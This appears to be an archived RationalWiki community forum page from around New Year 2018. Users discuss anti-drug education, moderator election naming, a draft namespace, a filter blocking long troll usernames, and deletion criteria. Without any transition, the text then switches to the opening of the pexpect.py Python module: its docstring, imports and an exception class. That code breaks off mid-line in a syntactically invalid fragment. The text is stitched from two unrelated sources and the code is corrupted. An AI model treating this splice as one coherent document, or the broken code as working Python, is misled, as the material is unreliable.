- I think it is a consequence on the whole War on Drugs thing. Still, educators had some effect on me by scaring me away from smoke, marijuana, cocaine, las, any sort of mind altering substance with short term benefits but with long term consequences. They kind of overblown alcohol and marijuana, which I like my beer, but I thought marijuana was some dangerous substance that'll get you hooked like nicotine does. --It's-a me, LeftyGreenMario!(Mod) 19:40, 1 January 2018 (UTC)
- Same here. Growing up, I quickly learned to take the melodramatic and sensationalist claims of anti-drug education/media with a grain of salt. But it did encourage me to be careful around recreational substances, and helped me understand that substance abuse can be a very serious issue. 98.110.112.28 (talk) 21:45, 1 January 2018 (UTC)
- I once had a talk where the person did just stick to the facts. He made it very clear that, if you ever did try drugs, you most likely wouldn't enjoy it. —Kazitor, pending 21:50, 1 January 2018 (UTC)
- i grew up with virtually no 'formal' drug education. years of substance abuse issues later...well, swings and roundabouts AMassiveGay (talk) 21:57, 1 January 2018 (UTC)
Manual archiving[edit]
While Archivist's absent, should we just archive old threads manually? This page is getting rather long. —Kazitor, pending 01:57, 1 January 2018 (UTC)
- Sure —ClickerClock (talk) 02:29, 1 January 2018 (UTC)
- Yes! Bongolian (talk) 02:56, 1 January 2018 (UTC)
Alright, done. I moved everything older than the 25th, and left some one line threads since the bot seems to avoid those. —Kazitor, pending 05:18, 1 January 2018 (UTC)
Happy New Year![edit]
-💎📀1️⃣ (talk) 04:05, 1 January 2018 (UTC)
- Man, people are always too early. New Year's really doesn't start until four hours from now here. Damn everyone else in the east time zones. --It's-a me, LeftyGreenMario!(Mod) 04:07, 1 January 2018 (UTC)
- Six minutes to midnight here.:54, 1 January 2018 (UTC)
Your Thoughts[edit]
ShiningSwordofThoughts (talk) 22:15, 1 January 2018 (UTC)
- Can you at least provide a summary when you post youtube videos? AMassiveGay (talk) 22:20, 1 January 2018 (UTC)
- And could you use the "add topic" button? When I saw your edit in recent changes I assumed you were replying to Fuzzy about the community survey. Christopher (talk) 10:59, 2 January 2018 (UTC)
Pedantry[edit]
Surely '2018 moderator election' would be more logical - even if the process did start a few days early. Anna Livia (talk) 22:49, 2 January 2018 (UTC)
- The campaigning started in 2017, so I think calling it 2017 is better. Maybe calling it 2017-2018 election would be better БaбyЛuigiOнФire🚓(T|C) 23:00, 2 January 2018 (UTC)
- I'd say that because the mods being elected serve in 2018, it should be the 2018 mod election. Add that to my list of campaign promises :P —Kazitor, pending 23:02, 2 January 2018 (UTC)
- I vote 2018., 3 January 2018 (UTC)
- In the grand scheme of things, it won't matter much in a couple of years whether it's indexed by 2017 or 2018. Regards, Cosmikdebris (talk) 02:35, 3 January 2018 (UTC)
- But people seeing '2017' are likely to ignore the rest of the sentence. Anna Livia (talk) 10:51, 3 January 2018 (UTC)
please don't make me change anything, the mob is free to vote on this, i don't think it matters Herr FuzzyKatzenPotato (talk/stalk) 11:38, 3 January 2018 (UTC)
- Likewise, I don't think change is necessary. But if we really have to, why not call it the 2017-18 Moderator Election (academic style)? Nerd (talk) 15:26, 3 January 2018 (UTC)
The last one was called the 2016 moderator election, the one before that 2015 etc. To someone who didn't have any context, it'd look like we didn't have an election this year. Christopher (talk) 15:36, 3 January 2018 (UTC)
- Even if someone went through all of the election pages and moved them all forward a year (which would be a lot of effort for no gain), people in past discussions would still refer to them as what they've always been called. This is incredibly poorly thought through. Christopher (talk) 17:52, 3 January 2018 (UTC)
Here's a vote so I don't have to look at this inanity[edit]
Let's try to get a normal distribution, guys. :-) Nerd (talk) 17:45, 3 January 2018 (UTC)
- @Bigs, what's with your obsession with multi polls replacing discussion? Discussion allows people to convince others that they're right, and allows of obvious troll "votes" to be ignored. Christopher (talk) 17:52, 3 January 2018 (UTC)
- Either 2017-18 (or relevant years) Moderator Elections - or hold them at some other point in the year - so the pedants are less likely to complain. Anna Livia (talk) 18:43, 3 January 2018 (UTC)
- Or we could just keep it as it is. Christopher (talk) 19:00, 3 January 2018 (UTC)
- i believe more canand should be done to actively piss off pedants everywhere. AMassiveGay (talk) 20:20, 3 January 2018 (UTC)
- Despite advocating 2018, I'm actually going for 2017. There needs to be a 2017 one, rather than apparently skipping it. And changing anything is always hassle. —Kazitor, pending 21:17, 3 January 2018 (UTC)
- Complete the irregular verb - 'I am pointing out something that needs considering, you are a pedant, they are (what)'? Anna Livia (talk) 23:49, 3 January 2018 (UTC)
Do we have an article of plant music?[edit]
Does music help plants grow? And do we have an article on it? This is the New age hypothesis I've encountered a couple times throughout my life. I assume it's a pile of bull, but I haven't encountered any refutations or commentary on popular/notable websites.—Hamburguesa con queso con un cara (talk • stalk) 04:29, 3 January 2018 (UTC)
- I don't think we do. There's a related bit of nuttery: talking to your plants makes them grow better. Jerry Baker promoted this in the 1970s with a bunch of books, in particular, Talk to Your Plants, and Other Gardening Know-How I Learned from Grandma Putt and Plants Are Like People. Bongolian (talk) 08:04, 3 January 2018 (UTC)
- Prince Charles is an advocate apparently.
- And plants #are# a non-disruptive audience. Anna Livia (talk) 11:10, 3 January 2018 (UTC)
- I think Mythbusters did an episode on this one and found it to be plausible (with rock music). But I think a more official scientific source might be worth looking into just in case their results might be off. Comrade GC (talk) 11:19, 3 January 2018 (UTC)
- I don't think it would be an inverse stopped clock, Mythbusters did try and promote critical thinking but weren't particularly rigorous. Christopher (talk) 11:33, 3 January 2018 (UTC)
- I've seen a couple Mythbusters episodes. It's an entertainment show first and an educational show second. But unfortunately, I can't find any significant debunking on the Internet. I just find a bunch of obscure sites covering it. Perhaps it's time for RationalWiki to shed some light on the issue.—Hamburguesa con queso con un cara (talk • stalk) 20:38, 3 January 2018 (UTC)
- Some slightly more plausible (at first glance) sounding bullshit is that it's not the sounds but the extra CO2 it surrounds the plant with. I doubt CO2 is the limiting factor for photosynthesis or any other reactions requiring it (I don't think there are many) for most plants under most circumstances though. Christopher (talk) 20:47, 3 January 2018 (UTC)
- There's also a lot of amusing claims about how animals respond to music. Not scientifically rigorous. --Gospatric (talk) 17:27, 3 January 2018 (UTC)
- Don't forget - animals may hear music differently to us. Anna Livia (talk) 18:46, 3 January 2018 (UTC)
RZ94's potential projects for 2018[edit]
- Judge Judy- Bigotry towards the disabled
- Golo Diet- Popping a bunch of supplements to lose weight. Plus they silence critics by suing them.
- Nations University- A fundie school stuck on the back side of the 1960's. They are actually scared of communists.
--Rationalzombie94 (talk) 22:22, 3 January 2018 (UTC)
Clinton and Trump are equally unpopular[edit]
I can't say I'm surprised. I find both of them quite unfavorable.:25, 23 December 2017 (UTC)
- Never been a fan. Part of it was that I am old enough to remember the first Clinton administration, when the Democrat president got behind "welfare reform", deregulation, 3 strikes laws, copyright extension, video game censorship, abstinence-based sex education, and purges of undocumented immigrants. There is no way in hell that anybody is going to sell me on the notion that Hillary Clinton is a 'progressive', or stands for anything other than herself. Her whiny new ghostwritten book did nothing to improve her. Not a huge Christopher Hitchens fan, but No One Left to Lie To remains the definitive take on the Clintons. - Smerdis of Tlön, LOAD "*", 8, 1. 19:30, 23 December 2017 (UTC)
- I don't particularly care anymore how Clinton performs and I hope she gets out of the political arena for good. On the other hand, Trump's popularity is still too high, needs to be sub30, but if it goes even lower, I'm not complaining either. --It's-a me, LeftyGreenMario!(Mod) 21:20, 23 December 2017 (UTC)
- From the other side of the pond, I canna say that surprises me. Panzerfaust (talk) 10:42, 24 December 2017 (UTC)
This just goes to show that the Democrats can't afford to run another bland moderate candidate in 2020, it else they're going to keep losing. A hard liberal with progressive policy proposals and a cleaner record of supporting the right sides on the issues is virtually guaranteed to beat Trump in 2020. Hopefully that's who Democratic primary voters pick. PBfreespace (talk) 18:40, 24 December 2017 (UTC)
- #Warren2020, 24 December 2017 (UTC)
- Mmm, guys! We just had an election. Let's not worry too much about 2020, shall we? We will cross that bridge when we get there. Nerd (talk) 22:21, 24 December 2017 (UTC)
- I still have my doubts that even a progressive will cream Trump. I'm pessimistic enough to believe that voters will just listen to party loyalty. Even if Sanders promised free ponies for everyone, people wouldn't vote him because he's part of the Democratic Party. On the other hand, Sanders does have the populist appeal. Let's see how the media reports on Sanders. As far as we've seen, they're way more interested in Trump and his voter demographics, annoyingly enough. --It's-a me, LeftyGreenMario!(Mod) 22:30, 24 December 2017 (UTC)
- If there's a conspiracy theory, chances are the group it's trying to smear are either "The Jews" or "The Clintons". The amount of hate conjured up for them out of thin air is astonishing. All those debunked 90s chain letters about a kill count and the dozen Benghazi hearings where she didn't do anything wrong seemed to have worked as propaganda. Shame that this includes a number of people who count themselves as skeptics and rationalists. As far as a candidate goes, you generally don't see a more radical candidate chosen when they lost the last election. Strategy would be that, since the incumbent can always be painted as failing, the opposition party can pick someone more moderate to pick up moderate voters who have become disillusioned with the extremist. Plus, there's a reason California has some of the most Liberal politicians and places like Mississippi have some on the far-right. In states where the liberal or the conservative consistently wins, they don't have to worry about moving toward the middle. Instead, they have to worry about being primary-ed from someone further along the left or right, respectively. With the Presidency going to Trump instead, that just means the Democrat candidate can, and likely will, be further to the right than either of the Clintons ever were to try and pick up those voters.-PsychoGecko (talk) 11:03, 25 December 2017 (UTC)
Comic[edit]
This is how we sound right now. Cartoon by Barry Deutsch, a Jewish man. Image description at his blog post. —ClickerClock (talk) 09:33, 27 December 2017 (UTC)
- The democrats would not do well appealing to my specific beliefs(low-grade antitheism would not sell well, nor would wonky obsession with reforming elections), and I find that sad. Though I suspect if they were to really emphasize a certain subset of my beliefs, they'd do way better. ikanreed 🐐Bleat at me 14:54, 29 December 2017 (UTC)
- The truth of good politics: emphasize policies that have the potential to garner majority support. That doesn't mean you have to abandon the interests of small minorities. The average voter is selfish. Don't spend a lot of time telling them what you plan to do for someone else.Ariel31459 (talk) 22:02, 4 January 2018 (UTC)
Vote LeftyGreenMario for Moderator! She is the best candidate![edit]
Remember to vote in this election! The Undead Schizophrenic (with Depression, Borderline Personality Disorder and Bipolar) says so. --Rationalzombie94 (talk) 17:24, 28 December 2017 (UTC)
- Vote for meh! Down with the Old Guard!:35, 28 December 2017 (UTC)
- You can officially endorse candidates here. :) --It's-a me, LeftyGreenMario!(Mod) 20:57, 28 December 2017 (UTC)
- I would vote for her because she is a girl. J. Zoia (talk) 15:26, 30 December 2017 (UTC)
- Unfortunately @J. Zoia you are ineligible to vote at this time. Comrade GC (talk) 15:30, 30 December 2017 (UTC)
Idea: draft namespace[edit]
One thing we seem to really hate are stubs. But the thing about the stubs is they're not usually bad (for some value of "bad"), just low quality or devoid of content. The general idea is we don't want people to see low quality articles amongst our other stuff.
The current convention is to work on such articles in one's userspace, but this has a downside of low visibility, and it can be uncertain whether other users can edit it. I suggest a dedicated namespace for such drafts and stubs, so they can be worked on whilst kept separate from our good material. Thoughts? —Kazitor, pending 07:15, 1 January 2018 (UTC)
- I like that idea a lot. Draft namespace sounds really good to me.Spud (talk) 09:28, 1 January 2018 (UTC)
- Sounds good. Christopher (talk) 10:04, 1 January 2018 (UTC)
- I've created a pull request that adds in a draft namespace. Christopher (talk) 10:19, 1 January 2018 (UTC)
- @Christopher On lines 249 to 251, you appear to have forgotten the commas between the array items. I'm not too familiar with github (should get onto that at some point), so you will want to fix that. —Kazitor, pending 10:48, 1 January 2018 (UTC)
- @Kazitor Thanks! (The last one isn't meant to have a comma though). Christopher (talk) 11:06, 1 January 2018 (UTC)
- Eh, it's PHP and commas on the ends of long arrays like that are sort of a convention so you can't forget them when adding to the list. They don't cause any errors. Although, personally, I don't do it either. —Kazitor, pending 11:08, 1 January 2018 (UTC)
- Oh, what little PHP I know I just sort of picked up from seeing code. Christopher (talk) 10:58, 2 January 2018 (UTC)
- For some of us [27] is more understandable than page :)
- We all find topics which are worth a RW mention but which we as persons wish 'the proverbial someone else' to develop (or at least give a second opinion on). Some will be viable in their own right, others will be 'mentions/a subsection on another page, and there will be those which are promptly forgotten about. Perhaps 'Sandbox: topic X' type entries on talk pages of topics 'one level up' (so eg Oumuamua might appear initially on Space Woo) and then a decision could be made. Anna Livia (talk) 18:26, 2 January 2018 (UTC)
- I honestly don't understand the problem some people have with stubs. If the article is a stub then people are welcome to expand it. If not, and it's on mission, then leave it alone. If it's a stub that is not sufficient reason for deletion. I suspect that if we create "draft space" then articles which would otherwise be be (very) slow-growing stubs will simply languish in obscurity. Let stubs live!Bob"Life is short and (insert adjective)" 18:37, 2 January 2018 (UTC)
- I don't either. It isn't like we're on any deadline. - Smerdis of Tlön, LOAD "*", 8, 1. 18:45, 2 January 2018 (UTC)
- Unlike Wikipedia (which rightly allows stubs), we have our reputation to think about. If someone first finds out about RationalWiki through a shitty stub, they're likely to think that we're a useless website not worth wasting their time on. If a stub could've been put together by any English speaking person with 10 minutes spare and access to Google, it's not worth having. Christopher (talk) 19:20, 2 January 2018 (UTC)
I strongly support a draft page. I think I've even said that if you want to work on an article, but want to save work for later due to a busy life, it's best to construct it as a draft in your userspace rather than make a complete mainspace article out of it. БaбyЛuigiOнФire🚓(T|C) 20:45, 2 January 2018 (UTC)
- Same here. There are all sorts of unfinished articles in userspace by people who have long since left. If there was a draftspace, these articles could be finished by anyone, and would be easier to find if there was a link to draftspace on, say, the to-do list. I suggest also having a "move to draft" option on AfD discussions. Readymade (talk) (bloody Sophie again) 17:06, 3 January 2018 (UTC)
- Next suggestion 'Category:x-field stub' - so that those interested in the wider x-field can find the relevant short entries more rapidly: and general interest in Oumuamua is probably decreasing (until the next weird or potentially doomsday-ish flyby). Anna Livia (talk) 19:19, 3 January 2018 (UTC)
- We already have this, take a look at all of the subcategories of Category:Articles needing expansion. Christopher (talk) 19:27, 3 January 2018 (UTC)
Evangelism in Xmas[edit]
It seems those people like to practice outreach during these days. In the last two weeks, I've had more encounters with 'em attempting to convert me than in the last months including some of a sect that have most other Evangelical churches against it, as they've these behind, a pair of Jehovah Witnesses -who did not even get the house's door being open-, and especially one who after my usual reply began with the BS of Jesus' sacrifice and that if everything was gonna end that moment I'd not be saved -thank Gods the bus came in that moment-. Panzerfaust (talk) 22:22, 3 January 2018 (UTC)
- You could always try to convert them to the path of Cthulhu, if you're feeling particularly bored. Comrade GC (talk) 22:26, 3 January 2018 (UTC)
- You could do this- ask, "Do you want to hear about my lord and savior Ba'al"? or ask, "Want to hear about the Goddess Asherah"? or if you are not Pagan (I am Pagan and did something like that), "You want to learn the truth of Evolutionary Biology and Astrophysics"? If you are atheist. One time when my biological dad had his stroke, a nurse would come by to help him. This nurse would preach about the Christian God and Jesus. She graduated from none other than Bob Jones University. So in response, my mom and a friend pretended to be lesbians just to get her to leave. It was classic. --Rationalzombie94 (talk) 03:17, 4 January 2018 (UTC)
- i find 'no thanks, not my thing' and closing the door or walking on works pretty well. AMassiveGay (talk) 11:44, 4 January 2018 (UTC)
- I haven't tried it myself, but there's a line in Kingsman: The Secret Service that could work against particular groups: "I'm a Catholic whore, currently enjoying congress (out of wedlock) with my Jewish black boyfriend who works at the military abortion clinic. So hail Satan, and have a lovely day, madam." —Kazitor, pending 11:53, 4 January 2018 (UTC)
- My approach with these has been double (it's a bad idea to approach someone who is reading a book about galactic astronomy and cosmology): either telling them that I'm not interested on their "eternal life", how an asshole was Yahweh in the OT, what about -precisely- Asherah (which I very seriously doubt they'll know about; I'm talking about all of them being inmigrants, who come with a lower cultural level -whatever is called-), the many errors and inconsistences of "the Book" (starting with the discrepances on the four Gospels), and the failure of things written there that were supposed to going to pass ('nuff said), or telling them that I've already a religion and I'm not interested in others, thanking them -and if they insisted, which never has happened, talking them about any fictional RPG deity as I still remember stuff of when I played D&D-. The latter has worked most of the time except the last one when the guy began with the Jesus' sacrifice thing and that if everything was going to end game over for me. Shit, as it happened the New Year's day with just a couple hours of sleep -thus pretty much zombified-, caught me off-guard while I was taking some shots of the full Moon to fight drowsiness, he scared me being taller than me and was fearing when I replied that I'd be left with no camera and some beating. Luckily the bus came and he went away with the same "I'll pray for you/remember to accept Jesus/whatever" (don't remember well).
- I really hope the next time, if there's one, I'll not be off-guard. I've a lot of desire to talk them about the beauty of the way the Universe evolved according to the Big Bang theory -and how is does not appear at all in Genesis- or about, say, Eldath, goddess of peace and waterfalls, in the Forgotten Realms. Panzerfaust (talk) 14:35, 4 January 2018 (UTC)
- What I tell Mormons is that 'In the real Bible, it talks about Jericho and Jerusalem and Tyre and Nazareth. I'm not sure anything happened exactly as described, but I can say with a high degree of confidence that these were all real places. What happened to yours?' - Smerdis of Tlön, LOAD "*", 8, 1. 17:28, 4 January 2018 (UTC)
- I just ask them how Jesus can both be King of the Jews and the son of god when only a direct male descendent of Judah (and David) can be king. Mary could not be heir; for that to be true, even if all other descendents of King David had died the throne would pass on to the other male members of Judah, and even if all the men were direct male descendants of converts instead of Judah, the title would still be passed on to a Levi or Kohan who are not descendants of converts. Nor does adoption does not pass on the heir either, so even if Joseph was the heir the title wouldn't go to Jesus. CorruptUser (talk) 21:11, 4 January 2018 (UTC)
What are the causes of the proxy conflict between Saudi Arabia and Qatar?[edit]
Does anybody here have a good analytical grip on the situation? Gewgtweg (talk) 19:00, 26 December 2017 (UTC)
Well... this unfortunate post had to welcome the new year completely alone. I guess identity politics is more interesting than international relations for most people here. Gewgtweg (talk) 17:07, 3 January 2018 (UTC)
- It stems from the Arab Spring, as the movement created a power vacuum in the region both nations hoped to fill. Qatar was generally supportive of the movement while Saudi Arabia was generally opposed. Other issues include the belief that Qatar is too pro-Iranian (Saudi Arabia's primary rival in the region), runs Al-Jazeera (many gulf states view the news broadcaster as hostile to their interests), and is accused of supporting pro-Iranian groups such as Hamas and the Muslim Brotherhood. It doesn't help that Qatar used to be essentially a vassal of Saudi Arabia, but through its immense fossil fuel wealth has allowed the small country to not only carve its own path, but have influence far greater than a nation its size would have. Hope that helps. BMcP - Just an astronomy guy 14:58, 7 January 2018 (UTC)
Community survey results[edit]
Promising to post stuff today was a bad idea. I'll try my best. Oof. Cømяade FυzzчCαтPøтαтø (talk/stalk) 10:14, 1 January 2018 (UTC)
Can we make usernames more strict?[edit]
Can we have more limitations on usernames? Whenever a troll decides to create three troll accounts, the entire page is dominated by excessively long usernames such as "Bush did 9/11 and put chemicals into the water". Also, long usernames are obnoxious.—Hamburguesa con queso con un cara (talk • stalk) 19:59, 2 January 2018 (UTC)
- @CheeseburgerFace: I'm sure a filter that blocks usernames over a certain length wouldn't be hard to make, what should the limit be? Christopher (talk) 20:03, 2 January 2018 (UTC)
- Mods can spend some time trying to rename users. I'm aware that very long usernames are never practical for anyone but I'm not sure what kind of limit we should impose here, if we even should. --It's-a me, LeftyGreenMario!(Mod) 20:08, 2 January 2018 (UTC)
- If I remember correctly most sites with username limitations have a max limit of 16 to 20 characters. Comrade GC (talk) 20:12, 2 January 2018 (UTC)
- I think 20-25 characters is reasonable enough. Though that's my having 15 characters to begin with. --It's-a me, LeftyGreenMario!(Mod) 20:19, 2 January 2018 (UTC)
- If I remember correctly MediaWiki has a limit, it's just really, really big. Christopher (talk) 20:34, 2 January 2018 (UTC)
- A quick engine search tells me that MediaWiki can support to 255 characters. >.> --It's-a me, LeftyGreenMario!(Mod) 20:37, 2 January 2018 (UTC)
- who would *ever* make an account with even more than 30 characters? БaбyЛuigiOнФire🚓(T|C) 20:43, 2 January 2018 (UTC)
- About half the Grawp-style usernames. Look through the user creation log. RoninMacbeth (talk) 20:47, 2 January 2018 (UTC)
- I don't count asstwats like him to be legit users. БaбyЛuigiOнФire🚓(T|C) 20:48, 2 January 2018 (UTC)
- Neither do I, but he does make lots of accounts with long usernames. As for why MediaWiki's absurd character length, I don't know. I think a cap of 25 characters is fairly reasonable. RoninMacbeth (talk) 20:52, 2 January 2018 (UTC)
- A 25 character limit is reasonable.—Hamburguesa con queso con un cara (talk • stalk) 21:21, 2 January 2018 (UTC)
- A quick look at the user list shows that long account names are almost always associated with a spammer or troll. A 20-25 character limit seems perfectly reasonable. Regards, Cosmikdebris (talk) 20:49, 2 January 2018 (UTC)
- I made a filter blocking all usernames longer than 25 characters, if there's a better way of doing it, feel free to do so but this should work fine. Christopher (talk) 21:49, 2 January 2018 (UTC)
- A whole two minutes of work down the drain, it doesn't work. The only reason I can think of is that it doesn't register the account you're trying to create as your username, it still treats your IP as your username. It'll probably have to be done by changing the MW configuration. Christopher (talk) 21:56, 2 January 2018 (UTC)
(reset) What about the potentially reasonable contributors who are a supporter of derivatives of anti-disestablishmentarism (and others of that ilk) and the person attempting to revive [28]? Anna Livia (talk) 10:49, 3 January 2018 (UTC)
- There's a handy template for that, it's
{{outdent}}. And to answer your question, they are told that the name's too long so they can think of something shorter. It's not a huge obstacle. —Kazitor, pending 11:03, 3 January 2018 (UTC)
- Should the warning explain that they can pick a short username and ask for their first choice at RW:Requests to change username if they're a legitimate user with a name of, say, 26 characters or thereabouts (which is still a bit long, but not that disruptive). Christopher (talk) 11:29, 3 January 2018 (UTC)
This was good work! Can someone figure out what MediaWiki text should be edited to inform users of the length limit? Cømяade FυzzчCαтPøтαтø (talk/stalk) 11:37, 3 January 2018 (UTC)
- @FuzzyCatPotato, you mean MediaWiki:Abusefilter-warning-toolong? Christopher (talk) 11:40, 3 January 2018 (UTC)
- The two words and their derivatives are known as pseudo-synonyms for 'very long word.' Persons using such terms are unlikely to be trolls. Anna Livia (talk) 11:49, 3 January 2018 (UTC)
Since I can name at least 2 (semi) regular users with objectional usernames that are way shorter than 25 chars and no one seems to bat an eyelid about, i can safely say this is a waste of time. for bonus points im not going to name them - why single them out when no one else cares? AMassiveGay (talk) 13:59, 3 January 2018 (UTC)
- It's not going to stop all of them, but it will make it hard to have usernames along the lines of "[insert harassment target here] is a whore/deserves to die" etc. Plus long usernames clog up recent changes massively on mobile. Christopher (talk) 14:06, 3 January 2018 (UTC)
- Beat me to the punch @Christopher. Comrade GC (talk) 14:09, 3 January 2018 (UTC)
- It would also be a good thing if mods and techs, who have the power to oversight or change objectionable usernames, actually did this. Readymade (talk) 17:12, 3 January 2018 (UTC)
- what exactly did we lose by doing this, may i ask? БaбyЛuigiOнФire🚓(T|C) 20:54, 4 January 2018 (UTC)
Everyone above is wrong and I, the smart person, am right[edit]
This problem does not require a technical solution. Ban, rename if necessary, move on. ikanreed 🐐Bleat at me 17:46, 3 January 2018 (UTC)
- It's not necessary, but it does make everything easier. Christopher (talk) 17:53, 3 January 2018 (UTC)
20:50 . . User account IWant2MakeCLersCry (talk | contribs | block) was created
20:46 . . User account BullyingC-leadersIsFun (talk | contribs | block) was created
20:43 . . User account I Hate Cheerleaders (talk | contribs | block) was created
- The recent edits summary as a result is far less annoying. Thanks everyone!—Hamburguesa con queso con un cara (talk • stalk) 20:59, 4 January 2018 (UTC)
- The filter managed to catch four (gradually shorter) attempts in two minutes. All them are obvious trolls, no legitimate users have been caught yet (well, except for me testing it). I think it was a great idea. —Kazitor, pending 21:40, 4 January 2018 (UTC)
Further suggestion: disallow questionable words[edit]
Either extend the filter, or create a new one, so harassment words like "hate" or "bitch" etc. aren't permitted. Perhaps even the word "is", that seems to be used a lot by trolls. —Kazitor, pending 21:46, 4 January 2018 (UTC)
- That would also cause a lot of false positives -- consider somebody who has the name Isaac or something similar trying to sign up with a username based on their name, or even Smerdis of Tlön. It would require some really complicated code to try to ban only the word is, given that a troll could sign up in any sort of format -- trying to formulate a script that would block the troll names while saving okay names would be nigh impossible. These users would probably end up being blocked using this plan (bold), plus Grawp could come up with some ways to bypass the filter (italics):
- BullyingCheerleadersIsFun [grawp]
- BullyingCheerleadersisFun [grawp]
- IsaiahN [non-troll]
- Bullying Cheerleaders is Fun [grawp]
- Smerdis of Tlön [non-troll]
- Bullying Cheerleaders Is Fun [grawp]
- Bullying Cheerleaders iz Fun [grawp]
- Isaac Smith [non-troll]
- It's Fun to Bully Cheerleaders [grawp]
- It'sFunToBullyCheerleaders [grawp]
- ItsFunToBullyCheerleaders [grawp]
- MichaelDukakis4Prez [non-troll, though a few years late]
- IsabelG [non-troll]
- ItzFunToBully_cheerleaders [grawp]
- DaisyO [non-troll]
- DiamondDisc1 [non-troll]
- I Love Bullying Cheerleaders [grawp]
- While blocking " Is " and " is " would probably be fine, it would only slow him down a bit, and is probably pointless in terms of effort/reward. Spriggina (sgwrs) (cyfraniadau) @ 04:14, 6 January 2018 (UTC)
- @Kazitor The word "is" is one of the most common words in the English language, right up there with the word "the".
- Negligible save. He can use 1337 speak or just troll by creating pages. The username length limit was a good proposal by me, however, this one is not.—Hamburguesa con queso con un cara (talk • stalk) 04:40, 6 January 2018 (UTC)
Proposed rules to govern AFD[edit]
RoninMacbeth proposed three criteria for deleting mainspace articles in September, under his proposed guidelines, at least two of these must be met for an article to be deleted:
- The article or topic is off-mission.
- The article is a stub with little to no chance of expansion.
- The article does not contain any sources, nor can anyone find sources for the claims within.
DiamondDisc (and presumably RoninMacbeth, if he hasn't changed his mind) both support this, I think it introduces bureaucracy that a wiki of our size doesn't need. What does everyone else think? Christopher (talk) 21:38, 3 January 2018 (UTC)
- With this current model, I could make a well sourced and very long article, and it would never get deleted despite it hardly being missional. Heck, so long as the articles are long and well sourced, I could cover the following:
- Mr. Krabz from SpongeBob
- Sex pillows
- Animal prostitution
- Rubber duckies
- The history Super Mario 64's development
- How to have sex with a goat
- A page filled with Harry Potter fanfiction
- Seriously, missionality should be a requirement.—Hamburguesa con queso con un cara (talk • stalk) 22:21, 3 January 2018 (UTC)
- Leave them as guidelines, but not set-in-stone rules. They might be useful for determining what sort of things can go, but shouldn't dictate it. —Kazitor, pending 22:31, 3 January 2018 (UTC)
- Non-missionality should be grounds for automatic deletion. As cheeseburgerface says, under these rules we could all write long, well-referenced articles about string or Danielle Steele or local house prices. AfD isn't perfect (although it's better than the previous arrangement), but this isn't an improvement. Readymade (talk) 22:49, 3 January 2018 (UTC)
- Correct. We don't need discussion for deleting articles that are obviously non-missional. Sysops currently have the capacity to delete articles with impunity that are obviously off mission, extremely small stubs, spam, doxing, harassment, legal threats etc. This is entirely reasonable. AFDs should be reserved for articles that are shortish and haven't been expanded, or articles that could be missional if someone put in the effort, and the like. Bongolian (talk) 04:21, 4 January 2018 (UTC)
- I think those 3 points have always been pretty much what I've had in mind every time I've nominated an article for deletion anyway. Obviously, as far as missionality goes, I've always nominated articles that I thought were kind of borderline. I thought they were off-mission but I wanted to know what other users thought. Anything that's obviously off-mission I've always killed on sight. But, yeah, I'd have to agree that those 3 points should be "more what you'd call guidelines than actual rules", me hearties! Spud (talk) 04:50, 4 January 2018 (UTC)
People already use those rules, they're just not explicitly stated right now. Just change "at least two" to "at least one" and it's the same as the status quo.) 14:34, 4 January 2018 (UTC)
Reads the fourth possibility. Don't give LGM any ideas!:04, 4 January 2018 (UTC)
- Is LGM a fan of rubber ducks? :P Spriggina (sgwrs) (cyfraniadau) @ 21:57, 4 January 2018 (UTC)
- @Bigs I WANT to create a funspace on the Mario game series because it has a ton of weird insane things like Wario dealing with the devil, Mario tipping over the Twin Towers, Mario praying to a Koran, Mario being a Vietnam soldier, and Hitler and World War II apparently being in the same universe as Mario's world. --It's-a me, LeftyGreenMario!(Mod) 19:42, 5 January 2018 (UTC)
- OK, so how about an article must be off-mission to be deleted, and the other two are grounds for merging/redirecting. RoninMacbeth (talk) 17:15, 7 January 2018 (UTC)
- Then someone could write a factually inaccurate two line stub on an authoritarian monarch (therefore missional) of a country that no longer exists who ruled in the 7th century BC and it couldn't be deleted because there's nothing to merge it with. If it ain't broke don't fix it, keep the rules as they are. Christopher (talk) 18:01, 7 January 2018 (UTC)
Jesus as a Mary Sue[edit]
The title text of some Wondermark comic said "Rudolph is a clasic Mary Sue. But then again, so is Jesus". This got me thinking, he really is one.
- He can perform miracles
- He loves everyone
- Everyone loves him
- He's literally related to God
- He's in heaven
And the thing about Mary Sues is that they're always author insertions in fan fictions. Thus, we can conclude that the writer(s) of the New testament saw the Old testament and thought, "I want to write a fanfic of this, and place myself as the son of God!" And being author insertions, they attempted to do away with all the meanness and be all-loving. —Kazitor, pending 21:16, 4 January 2018 (UTC)
- Oh gods and goddesses above and below!!! It all makes sense now!!! Comrade GC (talk) 21:18, 4 January 2018 (UTC)
- OH MY GOD!—Hamburguesa con queso con un cara (talk • stalk) 21:23, 4 January 2018 (UTC)
- But - not enough opportunity for some of the sub-genres of fanfic. Anna Livia (talk) 00:20, 5 January 2018 (UTC)
It also explains the part where God and Satan are sparkly vampires and they make out. 90.222.130.219 (talk) 18:26, 5 January 2018 (UTC)
- I'm not sure which Bible translation you're using, but that's certainly not in any of the ones I've read. Christopher (talk) 18:30, 5 January 2018 (UTC) | https://rationalwiki.org/wiki/RationalWiki:Saloon_bar/Archive281 | CC-MAIN-2022-21 | en | refinedweb |
apache
/
duo_unix
/
ed38a958bb39f42b77fb794ca7fb9a66420e46c0
/
.
/
tests
/
pexpect.py
blob: 67c6389faa1cddcac5ea6b5b8c00360a7b810e4f [
file
] [
log
] [
blame
]
"" Pexpect -- the function, run() and the class,
spawn. You can call the run() function to execute a command and return the
output. This is a handy replacement for os.system().
For example::
pexpect.run('ls -la')
The more powerful interface is the spawn class. You can use this to spawn an
external child command and then interact with the child by sending lines and
expecting responses.
For example::
child = pexpect.spawn('scp foo [email protected]:.')
child.expect ('Password:')
child.sendline (mypassword)
This works even for commands that ask for passwords or other input outside of
the normal stdio streams. (Let me know if I forgot anyone.)) 2008 Noah Spurrier
$Id: pexpect.py 507 2007-12-27 02:40:52Z noah $
"""
try:
import os, sys, time
import select
import string
import re
import struct
import resource
import types
import pty
import tty
import termios
import fcntl
import errno
import traceback
import signal
except ImportError, e:
raise ImportError (str(e) + """
A critical module was not found. Probably this operating system does not
support it. Pexpect is intended for UNIX-like operating systems.""")
__version__ = '2.3'
__revision__ = '$Revision: 399 $'
__all__ = ['ExceptionPexpect', 'EOF', 'TIMEOUT', 'spawn', 'run', 'which',
'split_command_line', '__version__', '__revision__']
# Exception classes used by this module.
class ExceptionPexpect(Exception):
"""Base class for all exceptions raised by this module.
"""
def __init__(self, = filter(self.__filter_not_pexpect, tblist)
